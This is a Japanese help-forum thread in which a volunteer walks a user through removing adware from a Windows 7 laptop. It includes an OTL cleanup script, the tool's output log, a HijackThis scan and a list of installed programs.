  • 2015/04/30 (Thu) 21:30:19
Firefoxの修正後、OTLでスキャンを
作業と報告、ご苦労様です。
OTLログを見せてもらいました。
では続きの作業です。

まずFirefoxに食い込んだ曲者を処置します。
まずFFを起動して上部の「ヘルプ」から「トラブルシューティング情報」を開いて、そこで「Firefoxのリフレッシュ」を押してください。
これを実行するとFFにインストールされた拡張類が初期化されます。
CCのFFタブのログで長々しい不正エントリが見つかっていたので、これを上記の手順で修正するわけです。

FFを終了したら今度はOTLで掃除しましょう。

このレスの最後にスクリプトを貼っておくので、それを丸ごとコピーして、それをWindowsのメモ帳ファイルに貼り付けて保存しておいてください。

用意できたらPCをまたセーフモードで再起動してOTL起動してください。
起動したらOTLのウインドウ下部にスクリプトを貼り付けて、今度は「Run fix」(赤字のボタン)を押してください。
これでOTLでの処置が開始されます。

しばらく待って処置ができたらPCを通常モードで再起動すると、またOTLのログが出るはずなので、それを保存してから、しばらく様子見の後、OTLのログとともに状態報告をレスください。
OTLのスクリプトは以下になります。破線(-----)を含まない箇所を丸ごとコピーして、それをOTLに貼って作業してください
------------------------------------------
:OTL
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{81C29D48-8D3F-4BBC-9824-E87957F028F4}: "URL" = http://search.yahoo.co.jp/search?ei=UTF-8&fr=tospccie4&p={searchTerms}
IE - HKLM\..\SearchScopes\{81C29D48-8D3F-4BBC-9824-E87957F028F4}: "URL" = http://search.yahoo.co.jp/search?ei=UTF-8&fr=tospccie4&p={searchTerms}
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\..\SearchScopes\{F49D92B5-40EB-4AA3-9DCB-180F1E9EEDF7}: "URL" = http://www.bing.com/search?FORM=SKY2DF&PC=SKY2&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\..\SearchScopes\D9A4CA08FD7249A89ED82E59C6608457: "URL" = http://search.yahoo.co.jp/search?ei=UTF-8&fr=ypcsm&p={searchTerms}

:Files

:Commands
[purity]
[resethosts]
[emptytemp]
[createrestorepoint]
[reboot]
------------------------------------------
  • 悪代官
  • 2015/04/30 (Thu) 22:07:00
Re: パソコン動作緩慢・広告類がひどい
すみませんFirefoxは現在使用しておらずパソコンから消去しているのですがどうすればよいですか?
  • T・T
  • 2015/04/30 (Thu) 22:29:20
Re: パソコン動作緩慢
とりあえず、OTLはやってみました
動作は少しはやくなりました。
後、パソコンから離れるため、しばらくレス出来ないかもしれないです。
その時はすみません

All processes killed
========== OTL ==========
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{81C29D48-8D3F-4BBC-9824-E87957F028F4}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{81C29D48-8D3F-4BBC-9824-E87957F028F4}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{81C29D48-8D3F-4BBC-9824-E87957F028F4}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{81C29D48-8D3F-4BBC-9824-E87957F028F4}\ not found.
Registry key HKEY_USERS\S-1-5-21-3164139845-2903138398-2106333873-1000\Software\Microsoft\Internet Explorer\SearchScopes\{F49D92B5-40EB-4AA3-9DCB-180F1E9EEDF7}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F49D92B5-40EB-4AA3-9DCB-180F1E9EEDF7}\ not found.
Registry key HKEY_USERS\S-1-5-21-3164139845-2903138398-2106333873-1000\Software\Microsoft\Internet Explorer\SearchScopes\{searchTerms}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{searchTerms}\ not found.
========== FILES ==========
========== COMMANDS ==========
C:\windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Owner
->Temp folder emptied: 3461632 bytes
->Temporary Internet Files folder emptied: 5109764 bytes
->Java cache emptied: 1165 bytes
->FireFox cache emptied: 4766210 bytes
->Google Chrome cache emptied: 365866178 bytes
->Flash cache emptied: 892 bytes

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 2019 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 50631 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 362.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 04302015_235052

Files\Folders moved on Reboot...
C:\Users\Owner\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • T・T
  • 2015/05/01 (Fri) 00:24:16
異常なければマイペースでレスをどうぞ
今夜もレスが遅くなってごめんなさい。

>動作は少しはやくなりました。

状況は少しずつながら改善しているようですね。

>後、パソコンから離れるため、しばらくレス出来ないかもしれないです。

はい、こちらは気にせずにいいので、普段の生活に支障ない範囲で作業とレスされればいいです。

OTLログも見せてもらいましたが、これで処置できるものは処置できたみたいです。

ではここでログから全体の再確認します。
またCCで各タブのログと、インストール情報とHJTのログも取り直して、それらをレスで見せてください。

GWに入ったので皆さん休暇や、逆にお仕事多忙な方もいるでしょうから、異常が出てなければこちらへのレスも急がなくていいです
  • 悪代官
  • 2015/05/01 (Fri) 20:37:25
Re: パソコン動作緩慢・広告類がひどい
遅くなってすみませんでした

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 17:10:43, on 2015/05/06
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17728)


Boot mode: Normal

Running processes:
C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
C:\Program Files (x86)\TOSHIBA\Sync Utility\TosSyncScheduler.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe
C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhrcusr.exe
C:\Program Files (x86)\EPSON\MyEPSON Connect\mep.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\AMSP\module\20013\ChromeExt\chromeextension\TmopChromeMsgHost32.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\chrome_extension2\host\chrome_native_msg_host.exe
C:\windows\SysWOW64\cmd.exe
C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\chromeextension\NativeMessageHost\ToolbarNativeMsgHost.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Owner\Downloads\HijackThis.exe
C:\windows\SysWOW64\DllHost.exe

F2 - REG:system.ini: UserInit=userinit.exe,
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O2 - BHO: Trend Micro Toolbar BHO - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O2 - BHO: CTPBIEAddonBHO - {4C149F6B-ED35-42CC-979F-77006AFA4453} - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Trend Micro Osprey BHO - {959A5673-7971-48e6-AF54-58F745AC4ABC} - C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
O2 - BHO: TOSHIBA Media Controller Plug-in - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
O3 - Toolbar: E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
O3 - Toolbar: セキュリティツールバー - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O4 - HKLM\..\Run: [TSUScheduler] %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
O4 - HKLM\..\Run: [LLHDUSER] "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
O4 - HKLM\..\Run: [TSleepSrv] %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
O4 - HKLM\..\Run: [ToshibaServiceStation] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
O4 - HKLM\..\Run: [TouchFree] C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
O4 - HKLM\..\Run: [ToshibaPlacesGadget] "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
O4 - HKLM\..\Run: [IME14 JPN Setup] C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
O4 - HKLM\..\Run: [EEventManager] "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
O4 - HKLM\..\Run: [NTTW_OSA_AUS] "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
O4 - HKCU\..\Run: [EPLTarget\P0000000000000000] C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - Global Startup: クライアントマネージャV.lnk = C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: OneNote に送る(&N) - res://C:\PROGRA~1\MICROS~2\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: TOSHIBA Bulletin Boardへ追加 - res://C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll/1000
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: OneNote に送る - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: OneNote に送る(&N) - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: 故障かな?と思ったら・・・ - {6CB1FA39-5745-4733-859F-E9C82A68F848} - C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
O9 - Extra button: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-229 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files\TOSHIBA\BulletinBoard\TosNcUi.dll,-228 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://dynabook.fresheye.com (HKLM)
O15 - Trusted Zone: http://www.ig.gmodules.com (HKLM)
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {53F4962A-8E27-4601-8B01-79A82B4D7FC9} (LoadPrg Class) - https://member.gungho.jp/front/member/webgs/LoadPrgAx.CAB
O18 - Protocol: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
O18 - Protocol: tmop - {69FD7CE3-4604-4FE6-967C-49B9735CEE70} - C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
O18 - Protocol: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O18 - Protocol: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\NTTW\Security\SEC\UIFramework\ProToolbarIMRatingActiveX.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\windows\System32\alg.exe (file missing)
O23 - Service: Security Solution Platform (Amsp) - Trend Micro Inc. - C:\Program Files\NTTW\Security\AMSP\coreServiceShell.exe
O23 - Service: Baidu Japanese IME Service_3.5.2.45 (BaiduJP_IME_Service_3.5.2.45) - Unknown owner - (no file)
O23 - Service: BWH32S - BUFFALO INC. - C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe
O23 - Service: ConfigFree WiMAX Service (cfWiMAXService) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFIWmxSvcs64.exe
O23 - Service: CLHNService - Unknown owner - C:\Program Files (x86)\CyberLink\RZ Player\Kernel\DMP\CLHNService.exe
O23 - Service: ConfigFree プロファイルサービス (ConfigFree Service) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\windows\System32\lsass.exe (file missing)
O23 - Service: EPSON V3 Service4(04) (EPSON_PM_RPCV4_04) - SEIKO EPSON CORPORATION - C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel(R) Corporation - C:\Program Files\Intel\WiFi\bin\EvtEng.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: LiveUpdate (LiveUpdateSvc) - IObit - C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
O23 - Service: LLHDClient - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDClient.exe
O23 - Service: LLHDCloader - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDCldr.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: MBAMScheduler - Malwarebytes Corporation - D:\Malwarebytes Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - D:\Malwarebytes Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\windows\System32\msdtc.exe (file missing)
O23 - Service: MyEPSON Connect Service - SEIKO EPSON CORPORATION - C:\Program Files (x86)\EPSON\MyEPSON Connect\mepService.exe
O23 - Service: Wireless PAN DHCP Server (MyWiFiDHCPDNS) - Unknown owner - C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\windows\system32\GameMon.des.exe (file missing)
O23 - Service: Toshiba Places Digestword (PBExtractService) - TOSHIBA CORPORATION - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\PBExtractService.exe
O23 - Service: Platinum Host Service - Trend Micro Inc. - C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSvcHost.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel(R) Corporation - C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - Unknown owner - C:\windows\system32\TODDSrv.exe (file missing)
O23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
O23 - Service: TOSHIBA eco Utility Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TECO\TecoService.exe
O23 - Service: TOSHIBA HDD SSD Alert Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
O23 - Service: TOSHIBA TosRzTf Control Service (TosRzTfSvc) - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\RegzaLinkDubbing\TosRzTfSvc.exe
O23 - Service: TPCHKarteSVC - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TKRTL\TPCHKarteSVC.exe
O23 - Service: TPCH Service (TPCHSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
O23 - Service: UDSS - Unknown owner - c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: Update Hold Page - Intel Corporation - (no file)
O23 - Service: Util Hold Page - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 15583 bytes

Adobe Flash Player 17 NPAPI Adobe Systems Incorporated 2015/04/27 6.00 MB 17.0.0.169
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver Atheros Communications Inc. 2012/04/24 1.0.0.36
BookPlaceReader Toshiba Book Place 2012/04/24 79.8 MB 1.6.80
BUFFALO AirStation倍速設定ツール(アンインストール) 2014/05/19
BUFFALO クライアントマネージャV をアンインストール BUFFALO INC. 2014/05/19 9.87 MB 1.4.10
CCleaner Piriform 2015/04/27 5.05
Conexant HD Audio Conexant 2012/04/24 8.51.1.0
Corel Digital Studio SE Corel Corporation 2012/04/24 1.79 GB 1.5.10.433
Epson Download Navigator SEIKO EPSON CORPORATION 2012/05/05 705 KB 1.0.1
Epson E-Photo SEIKO EPSON CORPORATION 2012/05/05 1.3.0.0
Epson E-Photo Plug-in for PMB(Picture Motion Browser) SEIKO EPSON CORPORATION 2012/05/05 1.00.0000
Epson E-Web Print SEIKO EPSON CORPORATION 2012/05/05 11.7 MB 1.09.0000
Epson Event Manager SEIKO EPSON CORPORATION 2012/05/05 40.5 MB 2.50.0000
EPSON PX-404A プリンター アンインストール SEIKO EPSON Corporation 2012/05/05
EPSON PX-404A ユーザーズガイド 2012/05/06
EPSON Scan Seiko Epson Corporation 2012/05/05
EPSON Scan OCR コンポーネント SEIKO EPSON Corp. 2012/05/05 1.20.0000
Google Chrome Google Inc. 2015/03/21 42.0.2311.135
Intel(R) Management Engine Components Intel Corporation 7.0.0.1144
Intel(R) Processor Graphics Intel Corporation 8.15.10.2509
Intel(R) Rapid Storage Technology Intel Corporation 10.1.2.1004
Intel(R) WiDi Intel Corporation 2012/04/24 139 MB 2.1.42.0
IObit Uninstaller IObit 2014/10/15 4.0.4.1
LAPLINK ヘルプデスク クライアント Intercom, Inc. 2012/04/24 1.22
LoiLoScope 2 LoiLo inc 2011/11/22 181 MB 2.0.3.1
Malwarebytes Anti-Malware バージョン 2.0.4.1028 Malwarebytes Corporation 2015/04/29 57.2 MB 2.0.4.1028
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/03/06 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/15 38.8 MB 4.5.51209
Microsoft Office 2010 Microsoft Corporation 2013/11/12 14.0.7015.1000
Microsoft Office ナビ 2010 Microsoft Corporation 2013/11/12 17.3 MB 14.0.7015.1000
Microsoft Primary Interoperability Assemblies 2005 Microsoft Corporation 2011/11/22 7.75 MB 9.0.21022
Microsoft Silverlight Microsoft Corporation 2014/07/24 249 MB 5.1.30514.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2011/11/22 1.69 MB 3.1.0000
Microsoft SQL Server Compact 3.5 SP2 ENU Microsoft Corporation 2012/04/24 3.39 MB 3.5.8080.0
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/05/05 2.62 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2011/11/22 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2012/05/04 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/04/24 230 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2011/11/22 596 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2011/11/22 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2012/05/04 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 15.0 MB 10.0.40219
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Microsoft Corporation 2014/10/16 10.0.50903
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - 日本語 Microsoft Corporation 2014/10/16 10.0.50903
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/09/29 8.03 MB 4.0.20823.0
MSXML 4.0 SP2 (KB954430) Microsoft Corporation 2014/11/16 1.27 MB 4.20.9870.0
MSXML 4.0 SP2 (KB973688) Microsoft Corporation 2014/11/16 1.33 MB 4.20.9876.0
MyEPSON Connect SEIKO EPSON Corporation 2012/05/05
NTT西日本 リモートサポートツール 西日本電信電話株式会社 2012/06/23
PCあんしん点検ユーティリティ TOSHIBA Corporation 2012/04/24 2.82 MB 1.1.3.0
PC引越ナビ 東芝情報機器株式会社 2011/11/22 12.7 MB 4.1.3
PhotoWizard Microsoft 2012/04/24 387 MB 1.0.0
PlayReady PC Runtime amd64 Microsoft Corporation 2011/11/22 2.05 MB 1.3.0
Realtek USB 2.0 Reader Driver Realtek Semiconductor Corp. 2012/04/24 1.0.0.7
Renesas Electronics USB 3.0 Host Controller Driver Renesas Electronics Corporation 2012/04/24 276 KB 2.0.34.1
RZプレーヤー CyberLink Corp. 2012/04/24 1.5.9508
Sempre
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/23 78.4 MB 7.3.101
Steam Valve Corporation 2014/09/29 2.10.91.91
Terraria Re-Logic 2014/09/29
TOSHIBA Bulletin Board TOSHIBA Corporation 2012/04/24 2.1.17.64
TOSHIBA ConfigFree TOSHIBA CORPORATION 2012/04/24 85.7 MB 8.0.42
TOSHIBA Disc Creator TOSHIBA Corporation 2012/04/24 11.0 MB 2.1.0.11 for x64
TOSHIBA ecoユーティリティ TOSHIBA Corporation 2012/04/24 18.8 MB 1.3.8.64
TOSHIBA Face Recognition TOSHIBA Corporation 2012/04/24 3.1.18.64
TOSHIBA Hardware Setup TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Manual TOSHIBA CORPORATION 2012/04/24 35.0 MB 0094.6404.2402
TOSHIBA Media Controller TOSHIBA CORPORATION 2012/04/24 1.0.87.4
